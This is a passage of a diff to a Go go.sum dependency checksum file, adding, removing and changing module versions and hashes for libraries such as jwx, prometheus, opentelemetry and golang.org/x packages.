github.com/hashicorp/go-retryablehttp v0.7.8 h1:ylXZWnqa7Lhqpk0L1P1LzDtGcCR0rPVUrx/c8Unxc48=
github.com/hashicorp/go-retryablehttp v0.7.8/go.mod h1:rjiScheydd+CxvumBsIrFKlx3iS0jrZ7LvzFGFmuKbw=
-github.com/hashicorp/go-version v1.9.0 h1:CeOIz6k+LoN3qX9Z0tyQrPtiB1DFYRPfCIBtaXPSCnA=
-github.com/hashicorp/go-version v1.9.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
+github.com/hashicorp/go-version v1.8.0 h1:KAkNb1HAiZd1ukkxDFGmokVZe1Xy9HG6NUp+bPle2i4=
+github.com/hashicorp/go-version v1.8.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
+github.com/henvic/httpretty v0.0.6 h1:JdzGzKZBajBfnvlMALXXMVQWxWMF/ofTy8C3/OSUTxs=
+github.com/henvic/httpretty v0.0.6/go.mod h1:X38wLjWXHkXT7r2+uK8LjCMne9rsuNaBLJ+5cU2/Pmo=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec h1:qv2VnGeEQHchGaZ/u7lxST/RaJw+cv273q79D81Xbog=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec/go.mod h1:Q48J4R4DvxnHolD5P8pOtXigYlRuPLGl6moFx3ulM68=
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8=
-github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI=
+github.com/klauspost/compress v1.18.2 h1:iiPHWW0YrcFgpBYhsA6D1+fqHssJscY/Tm/y2Uqnapk=
+github.com/klauspost/compress v1.18.2/go.mod h1:R0h/fSBs8DE4ENlcrlib3PsXS61voFxhIs2DeRhCvJ4=
github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE=
github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk=
-github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
-github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY=
github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
+github.com/lestrrat-go/blackmagic v1.0.4 h1:IwQibdnf8l2KoO+qC3uT4OaTWsW7tuRQXy9TRN9QanA=
+github.com/lestrrat-go/blackmagic v1.0.4/go.mod h1:6AWFyKNNj0zEXQYfTMPfZrAXUWUfTIZ5ECEUEJaijtw=
+github.com/lestrrat-go/dsig v1.0.0 h1:OE09s2r9Z81kxzJYRn07TFM9XA4akrUdoMwr0L8xj38=
+github.com/lestrrat-go/dsig v1.0.0/go.mod h1:dEgoOYYEJvW6XGbLasr8TFcAxoWrKlbQvmJgCR0qkDo=
+github.com/lestrrat-go/dsig-secp256k1 v1.0.0 h1:JpDe4Aybfl0soBvoVwjqDbp+9S1Y2OM7gcrVVMFPOzY=
+github.com/lestrrat-go/dsig-secp256k1 v1.0.0/go.mod h1:CxUgAhssb8FToqbL8NjSPoGQlnO4w3LG1P0qPWQm/NU=
+github.com/lestrrat-go/httpcc v1.0.1 h1:ydWCStUeJLkpYyjLDHihupbn2tYmZ7m22BGkcvZZrIE=
+github.com/lestrrat-go/httpcc v1.0.1/go.mod h1:qiltp3Mt56+55GPVCbTdM9MlqhvzyuL6W/NMDA8vA5E=
+github.com/lestrrat-go/httprc/v3 v3.0.2 h1:7u4HUaD0NQbf2/n5+fyp+T10hNCsAnwKfqn4A4Baif0=
+github.com/lestrrat-go/httprc/v3 v3.0.2/go.mod h1:mSMtkZW92Z98M5YoNNztbRGxbXHql7tSitCvaxvo9l0=
+github.com/lestrrat-go/jwx/v3 v3.0.13 h1:AdHKiPIYeCSnOJtvdpipPg/0SuFh9rdkN+HF3O0VdSk=
+github.com/lestrrat-go/jwx/v3 v3.0.13/go.mod h1:2m0PV1A9tM4b/jVLMx8rh6rBl7F6WGb3EG2hufN9OQU=
+github.com/lestrrat-go/option/v2 v2.0.0 h1:XxrcaJESE1fokHy3FpaQ/cXW8ZsIdWcdFzzLOcID3Ss=
+github.com/lestrrat-go/option/v2 v2.0.0/go.mod h1:oSySsmzMoR0iRzCDCaUfsCzxQHUEuhOViQObyy7S6Vg=
+github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69Aj6K7nkY=
+github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
github.com/machinebox/graphql v0.2.2 h1:dWKpJligYKhYKO5A2gvNhkJdQMNZeChZYyBbrZkBZfo=
github.com/machinebox/graphql v0.2.2/go.mod h1:F+kbVMHuwrQ5tYgU9JXlnskM8nOaFxCAEolaQybkjWA=
github.com/matryer/is v1.4.1 h1:55ehd8zaGABKLXQUe2awZ99BD/PTc2ls+KV/dXphgEQ=
@@ -54,71 +131,151 @@ github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hd
github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
-github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4=
+github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
+github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
-github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e/go.mod h1:pJLUxLENpZxwdsKMEsNbx1VGcRFpLqf3715MtcvvzbA=
+github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d h1:5PJl274Y63IEHC+7izoQE9x6ikvDFZS2mDVS3drnohI=
+github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
+github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
+github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db h1:62I3jR2EmQ4l5rM/4FEfDWcRD+abF5XlKShorW5LRoQ=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db/go.mod h1:l0dey0ia/Uv7NcFFVbCLtqEBQbrT4OCwCSKTEv6enCw=
+github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc=
+github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk=
+github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=
+github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
+github.com/open-policy-agent/opa v1.15.2 h1:dS9q+0Yvruq/VNvWJc5qCvCchn715OWc3HLHXn/UCCc=
+github.com/open-policy-agent/opa v1.15.2/go.mod h1:c6SN+7jSsUcKJLQc5P4yhwx8YYDRbjpAiGkBOTqxaa4=
github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
-github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
-github.com/rogpeppe/go-internal v1.9.0/go.mod h1:WtVeX8xhTBvf0smdhujwtBcq4Qrzq/fJaraNFVN+nFs=
+github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U=
+github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/prometheus/client_golang v1.23.2 h1:Je96obch5RDVy3FDMndoUsjAhG5Edi49h0RJWRi/o0o=
+github.com/prometheus/client_golang v1.23.2/go.mod h1:Tb1a6LWHB3/SPIzCoaDXI4I8UHKeFTEQ1YCr+0Gyqmg=
+github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk=
+github.com/prometheus/client_model v0.6.2/go.mod h1:y3m2F6Gdpfy6Ut/GBsUqTWZqCUvMVzSfMLjcu6wAwpE=
+github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9ZoGs=
+github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA=
+github.com/prometheus/procfs v0.17.0 h1:FuLQ+05u4ZI+SS/w9+BWEM2TXiHKsUQ9TADiRH7DuK0=
+github.com/prometheus/procfs v0.17.0/go.mod h1:oPQLaDAMRbA+u8H5Pbfq+dl3VDAvHxMUOVhe0wYB2zw=
+github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9 h1:bsUq1dX0N8AOIL7EB/X911+m4EHsnWEHeJ0c+3TTBrg=
+github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
+github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
+github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
+github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ=
github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc=
github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
+github.com/schollz/progressbar/v3 v3.19.0 h1:Ea18xuIRQXLAUidVDox3AbwfUhD0/1IvohyTutOIFoc=
+github.com/schollz/progressbar/v3 v3.19.0/go.mod h1:IsO3lpbaGuzh8zIMzgY3+J8l4C8GjO0Y9S69eFvNsec=
+github.com/segmentio/asm v1.2.1 h1:DTNbBqs57ioxAD4PrArqftgypG4/qNpXoJx8TVXxPR0=
+github.com/segmentio/asm v1.2.1/go.mod h1:BqMnlJP91P8d+4ibuonYZw9mfnzI9HfxselHZr5aAcs=
+github.com/sergi/go-diff v1.4.0 h1:n/SP9D5ad1fORl+llWyN+D6qoUETXNZARKjyY2/KVCw=
+github.com/sergi/go-diff v1.4.0/go.mod h1:A0bzQcvG0E7Rwjx0REVgAGH58e96+X0MeOfepqsbeW4=
github.com/sirupsen/logrus v1.9.4 h1:TsZE7l11zFCLZnZ+teH4Umoq5BhEIfIzfRDZ1Uzql2w=
github.com/sirupsen/logrus v1.9.4/go.mod h1:ftWc9WdOfJ0a92nsE2jF5u5ZwH8Bv2zdeOC42RjbV2g=
-github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM=
-github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y=
-github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
-github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+github.com/spf13/cobra v1.10.2 h1:DMTTonx5m65Ic0GOoRY2c16WCbHxOOw6xxezuLaBpcU=
+github.com/spf13/cobra v1.10.2/go.mod h1:7C1pvHqHw5A4vrJfjNwvOdzYu0Gml16OCs2GRiTUUS4=
+github.com/spf13/pflag v1.0.9/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+github.com/spf13/pflag v1.0.10 h1:4EBh2KAYBwaONj6b2Ye1GiHfwjqyROoF4RwYO+vPwFk=
+github.com/spf13/pflag v1.0.10/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U=
github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U=
+github.com/tchap/go-patricia/v2 v2.3.3 h1:xfNEsODumaEcCcY3gI0hYPZ/PcpVv5ju6RMAhgwZDDc=
+github.com/tchap/go-patricia/v2 v2.3.3/go.mod h1:VZRHKAb53DLaG+nA9EaYYiaEx6YztwDlLElMsnSHD4k=
+github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e h1:BuzhfgfWQbX0dWzYzT1zsORLnHRv3bcRcsaUk0VmXA8=
+github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e/go.mod h1:/Tnicc6m/lsJE0irFMA0LfIwTBo4QP7A8IfyIv4zZKI=
+github.com/valyala/fastjson v1.6.7 h1:ZE4tRy0CIkh+qDc5McjatheGX2czdn8slQjomexVpBM=
+github.com/valyala/fastjson v1.6.7/go.mod h1:CLCAqky6SMuOcxStkYQvblddUtoRxhYMGLrsQns1aXY=
+github.com/vektah/gqlparser/v2 v2.5.32 h1:k9QPJd4sEDTL+qB4ncPLflqTJ3MmjB9SrVzJrawpFSc=
+github.com/vektah/gqlparser/v2 v2.5.32/go.mod h1:c1I28gSOVNzlfc4WuDlqU7voQnsqI6OG2amkBAFmgts=
+github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb h1:zGWFAtiMcyryUHoUjUJX0/lt1H2+i2Ka2n+D3DImSNo=
+github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU=
+github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 h1:EzJWgHovont7NscjpAxXsDA8S8BMYve8Y5+7cuRE7R0=
+github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ=
+github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
+github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
+github.com/yashtewari/glob-intersection v0.2.0 h1:8iuHdN88yYuCzCdjt0gDe+6bAhUwBeEWqThExu54RFg=
+github.com/yashtewari/glob-intersection v0.2.0/go.mod h1:LK7pIC3piUjovexikBbJ26Yml7g8xa5bsjfx2v1fwok=
github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
-gitlab.com/gitlab-org/api/client-go v1.46.0 h1:YxBWFZIFYKcGESCb9fpkwzouo+apyB9pr/XTWzNoL24=
-gitlab.com/gitlab-org/api/client-go v1.46.0/go.mod h1:FtgyU6g2HS5+fMhw6nLK96GBEEBx5MzntOiJWfIaiN8=
+gitlab.com/gitlab-org/api/client-go v1.13.0 h1:MNH8a5UB4MgX2g0opJSWhHw2bfoWuWUoWXf/O/ppFC4=
+gitlab.com/gitlab-org/api/client-go v1.13.0/go.mod h1:adtVJ4zSTEJ2fP5Pb1zF4Ox1OKFg0MH43yxpb0T0248=
+go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
+go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
+go.opentelemetry.io/otel v1.40.0 h1:oA5YeOcpRTXq6NN7frwmwFR0Cn3RhTVZvXsP4duvCms=
+go.opentelemetry.io/otel v1.40.0/go.mod h1:IMb+uXZUKkMXdPddhwAHm6UfOwJyh4ct1ybIlV14J0g=
+go.opentelemetry.io/otel/metric v1.40.0 h1:rcZe317KPftE2rstWIBitCdVp89A2HqjkxR3c11+p9g=
+go.opentelemetry.io/otel/metric v1.40.0/go.mod h1:ib/crwQH7N3r5kfiBZQbwrTge743UDc7DTFVZrrXnqc=
+go.opentelemetry.io/otel/trace v1.40.0 h1:WA4etStDttCSYuhwvEa8OP8I5EWu24lkOzp+ZYblVjw=
+go.opentelemetry.io/otel/trace v1.40.0/go.mod h1:zeAhriXecNGP/s2SEG3+Y8X9ujcJOTqQ5RgdEJcawiA=
+go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI=
+go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU=
+go.yaml.in/yaml/v3 v3.0.4 h1:tfq32ie2Jv2UxXFdLJdh3jXuOzWiL1fo0bu/FbuKpbc=
+go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
+golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
+golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
+golang.org/x/exp v0.0.0-20250813145105-42675adae3e6 h1:SbTAbRFnd5kjQXbczszQ0hdk3ctwYf3qBNH9jIsGclE=
+golang.org/x/exp v0.0.0-20250813145105-42675adae3e6/go.mod h1:4QTo5u+SEIbbKW1RacMZq1YEfOBqeXa19JeshGi+zc4=
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
+golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c=
+golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
+golang.org/x/net v0.51.0 h1:94R/GTO7mt3/4wIKpcR5gkGmRLOuE/2hNGeWq/GBIFo=
+golang.org/x/net v0.51.0/go.mod h1:aamm+2QF5ogm02fjy5Bb7CQ0WMt1/WVM7FtyaTLlA9Y=
golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw=
golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.20.0 h1:e0PTpb7pjO8GAtTs2dQ6jYa5BWYlMuX047Dco/pItO4=
+golang.org/x/sync v0.20.0/go.mod h1:9xrNwdLfx4jkKbNva9FpL6vEN7evnE43NNNJQ2LF3+0=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20210831042530-f4d43177bf5e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.43.0 h1:Rlag2XtaFTxp19wS8MXlJwTvoh8ArU6ezoyFsMyCTNI=
-golang.org/x/sys v0.43.0/go.mod h1:4GL1E5IUh+htKOUEOaiffhrAeqysfVGipDYzABqnCmw=
+golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
+golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
-golang.org/x/term v0.42.0 h1:UiKe+zDFmJobeJ5ggPwOshJIVt6/Ft0rcfrXZDLWAWY=
-golang.org/x/term v0.42.0/go.mod h1:Dq/D+snpsbazcBG5+F9Q1n2rXV8Ma+71xEjTRufARgY=
+golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
+golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8=
-golang.org/x/text v0.32.0 h1:ZD01bjUt1FQ9WJ0ClOL5vxgxOI/sVCNgX1YtKwcY0mU=
-golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY=
-golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI=
-golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4=
+golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk=
+golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA=
+golang.org/x/time v0.15.0 h1:bbrp8t3bGUeFOx08pvsMYRTCVSMk89u4tKbNOZbp88U=
+golang.org/x/time v0.15.0/go.mod h1:Y4YMaQmXwGQZoFaVFk4YpCt4FLQMYKZe9oeV/f4MSno=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
+golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc=
+golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE=
+google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
+gopkg.in/h2non/gock.v1 v1.1.2 h1:jBbHXgGBK/AoPVfJh5x4r/WxIrElvbLel8TCZkkZJoY=
+gopkg.in/h2non/gock.v1 v1.1.2/go.mod h1:n7UGz/ckNChHiK05rDoiC4MYSunEC/lyaUm2WWaDva0=
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
